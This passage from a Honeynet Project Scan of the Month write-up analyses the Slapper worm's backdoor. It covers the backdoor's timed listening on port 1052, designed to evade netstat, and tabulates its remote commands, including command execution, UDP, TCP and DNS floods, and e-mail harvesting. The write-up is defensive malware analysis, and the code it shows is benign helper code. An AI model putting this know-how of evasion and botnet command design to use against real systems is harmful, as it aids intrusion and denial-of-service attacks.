	    <varname>struct sockaddr</varname> structure. In this case
	    our buddy aion <email>aion@ukr.net</email> is not
	    passing a pointer but an integer directly. You need to be
	    more careful when coding, <email>aion@ukr.net</email>.
	    </para>
	  </callout>
      </calloutlist>
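
      <para>
	For comparison, a call that follows the
	<function>accept()</function> contract could look like the
	sketch below. The wrapper name
	<function>accept_client()</function> and the use of
	<varname>struct sockaddr_in</varname> are my own choices for
	illustration; they do not appear in
	<filename>.update.c</filename>.
      </para>

      <programlisting><![CDATA[
```c
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

/* Accept one connection on listen_fd and store the peer address in
 * *peer. Returns the new socket descriptor, or -1 on error. */
int accept_client(int listen_fd, struct sockaddr_in *peer)
{
    /* The length is a variable initialized to the size of the address
     * buffer, and its ADDRESS is what accept() receives. */
    socklen_t len = sizeof(*peer);

    return accept(listen_fd, (struct sockaddr *)peer, &len);
}
```
]]></programlisting>

      <para>
	The only difference from the call quoted above is the last
	argument: a pointer to an initialized length instead of the
	length itself.
      </para>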
	
      <para>
	Now, <command>update</command> does not provide a shell on
	demand on TCP port 1052 of the host running the compiled
	version of <filename>.update.c</filename> at all times: the
	server is programmed to listen for just 10 seconds and then
	shut down for 5 minutes. See the next question for details.
      </para>

      <para>
	There isn't really anything else to say about
	<filename>.update.c</filename>. It is a very small program
	that can be understood in 2 minutes. It is pretty obvious
	what it does.
      </para>

    </sect2>
	
    <sect2><title>Question 11</title>

      <para>
	<emphasis role="bold">Q</emphasis> (Bonus Question) What is
	the purpose of the SLEEPTIME and UPTIME values in the
	.update.c program?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>:
	<varname>SLEEPTIME</varname> is a symbol defined at the
	beginning of the file as "300", and <varname>UPTIME</varname>
	is another symbol defined as "10". As I mentioned in the
	previous question, when <command>update</command> is run, it
	will open TCP port 1052 and will provide a shell on demand for
	<varname>UPTIME</varname> seconds. After
	<varname>UPTIME</varname> seconds have passed
	<command>update</command> will shut down the TCP server for
	<varname>SLEEPTIME</varname> seconds.
      </para>

      <para>
	My guess is that this feature is provided to make it less
	likely that a system administrator running the
	<command>netstat</command> command will find that a strange
	process is listening on a non-standard port.
      </para>
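
      <para>
	The effect of the two values can be made concrete with a
	little arithmetic. The sketch below assumes an idealized
	cycle in which the backdoor listens for exactly
	<varname>UPTIME</varname> seconds and then sleeps for exactly
	<varname>SLEEPTIME</varname> seconds, ignoring setup time
	and any time spent blocked inside
	<function>accept()</function>. The function names are
	hypothetical.
      </para>

      <programlisting><![CDATA[
```c
#define UPTIME    10   /* seconds the port is open, per the text above */
#define SLEEPTIME 300  /* seconds the port stays closed */
#define CYCLE     (UPTIME + SLEEPTIME)

/* Return 1 if the port would be open `elapsed` seconds after the
 * program started, 0 otherwise (idealized model). */
int backdoor_listening(long elapsed)
{
    if (elapsed < 0)
        return 0;
    return (elapsed % CYCLE) < UPTIME;
}

/* Fraction of time the port is open in the idealized model. */
double listening_fraction(void)
{
    return (double)UPTIME / (double)CYCLE;
}
```
]]></programlisting>

      <para>
	Under these assumptions the port is open for 10 out of every
	310 seconds, a little over 3% of the time, so a single
	<command>netstat</command> run is unlikely to catch it.
      </para>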
	  
    </sect2>

  </sect1>

  <!--  end  -->

  <appendix id="files">
    <title>Files</title>

    <para>
      The following files were generated during this Scan of the
      Month:
    </para>

    <itemizedlist>

      <listitem>
	<para>
	  Worm source code: <filename>.unlock.c</filename> and
	  <filename>.update.c</filename>. I am not including these
	  files here since it is very easy to generate them: just
	  download the file provided for <ulink
	  url="http://www.honeynet.org/scans/scan25/">Scan of the
	  Month November 2002</ulink> and follow the procedure I
	  presented in <xref linkend="inspection"/>.
	  </para>
      </listitem>

      <listitem>
	<para>
	  <ulink url="control.c.txt">control.c</ulink>: program that
	  makes it possible to control the worm analyzed in this
	  document. Please note that not all commands are implemented,
	  and that some commands have bugs in the worm source, so they
	  might not work at all.
	  </para>
      </listitem>

      <listitem>
	<para>
	  <ulink url="submission/">XML sources for this
	  document</ulink>: this HTML document was generated using
	  DocBook XML. This directory contains all the files used in
	  the generation of this document.
	</para>
      </listitem>

    </itemizedlist>

  </appendix>

  <appendix id="commands">
    <title>Worm Commands</title>

    <para>
      The following table contains the worm commands that are provided
      as a backdoor. The source code contains a few comments that give
      an idea of what some of the commands do. Other commands required
      study of the source code to be able to figure out what they
      do. I tested some of the commands by writing a small program
      that remotely controlled the backdoor.
    </para>

    <table id="table1" frame='all'>
      <title>Worm Commands</title>
      <tgroup cols='3' align='left' colsep='1' rowsep='1'>
	<colspec colname='c1'/>
	<colspec colname='c2'/>
	<colspec colname='c3'/>
	
	<thead>
	  <row>
	    <entry align="center">Command Code</entry>
	    <entry align="center">Function Performed</entry>
	    <entry align="center">Comments</entry>
	  </row>
	</thead>

	<tbody>
	  <row>
	    <entry>0x20</entry>
	    <entry>Get information</entry>
	    <entry>Information about current status of the worm
	    (version, IP address, etc.)</entry>
	  </row>
	  <row>
	    <entry>0x21</entry>
	    <entry>Open a bounce</entry>
	    <entry>Related to the peer-to-peer network. I believe it
	      allows the worm to proxy connections for another host</entry>
	  </row>
	  <row>
	    <entry>0x22</entry>
	    <entry>Close a bounce</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x23</entry>
	    <entry>Send message to a bounce</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x24</entry>
	    <entry>Run a command</entry>
	    <entry>The received packet includes, in addition to the
	      0x24 command code, the command that the attacker wants
	      the infected machine to execute. The worm has code to
	      send back the output of the command to a programmed
	      (also in the received packet) IP address. However, there
	      is a critical bug in the code that makes a forked worm
	      process crash when it tries to zero 3000 bytes in an
	      array that only holds about 12 bytes. The bug is due to
	      the declaration of a variable with the same name as
	      another one in a different context, which makes the
	      intended variable invisible from the current
	      scope. I tested this code and the command is executed,
	      although nothing is returned because of the bug.</entry>
	  </row>
	  <row>
	    <entry>0x25</entry>
	    <entry>Not implemented, does nothing</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x26</entry>
	    <entry>Route</entry>
	    <entry>Seems related to management of the peer-to-peer network</entry>
	  </row>
	  <row>
	    <entry>0x27</entry>
	    <entry>Not implemented, does nothing</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x28</entry>
	    <entry>List</entry>
	    <entry>Apparently, used to get a list of links to other
	      infected machines. Seems related to
	      management/monitoring of the peer-to-peer network</entry>
	  </row>
	  <row>
	    <entry>0x29</entry>
	    <entry>UDP flood</entry>
	    <entry>Starts a Denial of Service attack against another
	      host. UDP is used and the IP address and port to use, as
	      well as the duration of the attack, are specified in the
	      packet. I tested this and it works.</entry>
	  </row>
	  <row>
	    <entry>0x2a</entry>
	    <entry>TCP flood</entry>
	    <entry>Starts a Denial of Service attack against another
	      host. TCP is used and the IP address and port to use, as
	      well as the duration of the attack, are specified in the
	      packet. I tested this and it works.</entry>
	  </row>
	  <row>
	    <entry>0x2b</entry>
	    <entry>IPv6 TCP flood</entry>
	    <entry>Starts a Denial of Service attack against another
	      host. This is for IPv6. It is not enabled in the worm
	      source code (disabled with a #undef.)</entry>
	  </row>
	  <row>
	    <entry>0x2c</entry>
	    <entry>DNS flood</entry>
	    <entry>Starts a Denial of Service attack against a DNS server.
	      DNS requests are sent. The DNS server to use, as
	      well as the duration of the attack, are specified in the
	      packet. I tested this and the DNS query performed is broken.</entry>
	  </row>
	  <row>
	    <entry>0x2d</entry>
	    <entry>E-mail scan</entry>
	    <entry>Runs <command>find / -type f</command> and
	      searches every file found for e-mail addresses. Sends the
	      addresses it finds to UDP port
	      <varname>ESCANPORT</varname> (defined as 10100 at the
	      beginning of the file) of a host specified in the
	      incoming packet.</entry>
	  </row>
	  <row>
	    <entry>0x70</entry>
	    <entry>Incoming client</entry>
	    <entry>Handles registration of a newly infected machine</entry>
	  </row>
	  <row>
	    <entry>0x71</entry>
	    <entry>Receive the list</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x72</entry>
	    <entry>Send the list</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x73</entry>
	    <entry>Get my IP</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x74</entry>
	    <entry>Transmit their IP</entry>
	    <entry>Sends the IP address of the incoming client to
	      other registered clients</entry>
	  </row>
	  <row>
	    <entry>0x41 to 0x47</entry>
	    <entry>Relay to client</entry>
	    <entry>Resends received packet to all registered clients</entry>
	  </row>
	</tbody>
      </tgroup>
    </table>
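
    <para>
      When reading captured peer-to-peer traffic it can help to
      translate a command code into the name used in the table
      above. The following is a minimal sketch of such a lookup. It
      is not taken from the worm source; the names
      <literal>cmd_name</literal>, <literal>cmd_names</literal> and
      <literal>cmd_to_name</literal> are hypothetical, it assumes the
      command byte has already been extracted from the packet, and
      it only covers codes 0x26 and above.
    </para>

    <programlisting><![CDATA[
```c
#include <stddef.h>

/* Hypothetical helper for analysts; NOT part of the worm source.
 * It maps a command code from the table above to its name. Only
 * codes 0x26 and above are listed here. */
struct cmd_name {
    unsigned char code;
    const char *name;
};

static const struct cmd_name cmd_names[] = {
    { 0x26, "Route" },
    { 0x27, "Not implemented" },
    { 0x28, "List" },
    { 0x29, "UDP flood" },
    { 0x2a, "TCP flood" },
    { 0x2b, "IPv6 TCP flood" },
    { 0x2c, "DNS flood" },
    { 0x2d, "E-mail scan" },
    { 0x70, "Incoming client" },
    { 0x71, "Receive the list" },
    { 0x72, "Send the list" },
    { 0x73, "Get my IP" },
    { 0x74, "Transmit their IP" },
};

/* Returns a static string naming the command, or a fallback string
 * if the code is not in the subset above. */
const char *cmd_to_name(unsigned char code)
{
    size_t i;

    /* Codes 0x41 to 0x47 all share the "Relay to client" row. */
    if (code >= 0x41 && code <= 0x47)
        return "Relay to client";

    for (i = 0; i < sizeof(cmd_names) / sizeof(cmd_names[0]); i++)
        if (cmd_names[i].code == code)
            return cmd_names[i].name;

    return "Unknown or not listed";
}
```
]]></programlisting>

    <para>
      For example, <literal>cmd_to_name(0x29)</literal> returns
      "UDP flood", and any code in the range 0x41 to 0x47 returns
      "Relay to client". A linear search is enough here because the
      table is tiny.
    </para>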

  </appendix>

  <appendix id="refs"><title>References</title>

    <itemizedlist>

      <listitem>
	<para>
	  Information about the OpenSSL vulnerability exploited by the
	  worm:
	</para>

	<itemizedlist>
	  <listitem>
	    <para>
	      Advisory from CERT: <ulink
		url="http://www.cert.org/advisories/CA-2002-23.html">CERT
		Advisory CA-2002-23 Multiple Vulnerabilities In
		OpenSSL</ulink>.
	    </para>
	  </listitem>
	  <listitem>
	    <para>
	      Bugtraq information: <ulink
		url="http://online.securityfocus.com/bid/5363">OpenSSL
		SSLv2 Malformed Client Key Remote Buffer Overflow
	      Vulnerability</ulink>.
	      </para>
	  </listitem>
	</itemizedlist>
      </listitem>

      <listitem>
	<para>
	  Media coverage of the worm:
	</para>
	
	<itemizedlist>
	  <listitem>
	    <para>
	      A Wired article: <ulink
	      url="http://www.wired.com/news/technology/0,1282,55172,00.html">Linux
	      Worm Hits the Network</ulink>.
	    </para>
	  </listitem>
	  <listitem>
	    <para>
	      A CNET article: <ulink
	      url="http://news.com.com/2100-1001-958758.html?tag=fd_top">
	      Slapper worm smarting less</ulink>.
	      </para>
	  </listitem>
	</itemizedlist>
      </listitem>

      <listitem>
	<para>
	  A working knowledge of the TCP/IP protocols and of Unix
	  network programming with the BSD sockets API is necessary
	  to understand a worm like the one analyzed in this paper.
	  The following are my favorite books on these topics:
	</para>

	<itemizedlist>
	  <listitem>
	    <para>
	      Stevens, W. R. TCP/IP Illustrated, Vol. 1.
	      Addison-Wesley, 1994.
	    </para>
	  </listitem>

	  <listitem>
	    <para>
	      Stevens, W. R. Unix Network Programming, Vol. 1, 2nd
	      ed. Prentice Hall, 1998.
	    </para>
	  </listitem>
	</itemizedlist>
      </listitem>

    </itemizedlist>

  </appendix>

  <appendix>
    <title>Thanks</title>

    <para>
      Thanks to ...
    </para>

    <itemizedlist>

      <listitem>
	<para>
	  Chapu for being so patient while her husband was lost in
	  bits, bytes and lines of C source code, and for bringing so
	  much joy to my life. This is dedicated to you; you deserve
	  it a thousand times.
	</para>
      </listitem>

      <listitem>
	<para>
	  The <ulink url="http://www.honeynet.org">Honeynet
	    Project</ulink> for coming up with these highly
	  educational exercises, and for taking the time to go
	  over all the submissions. That must be a lot of work!
	  Keep 'em coming!
	</para>
      </listitem>

    </itemizedlist>

  </appendix>

  </article>
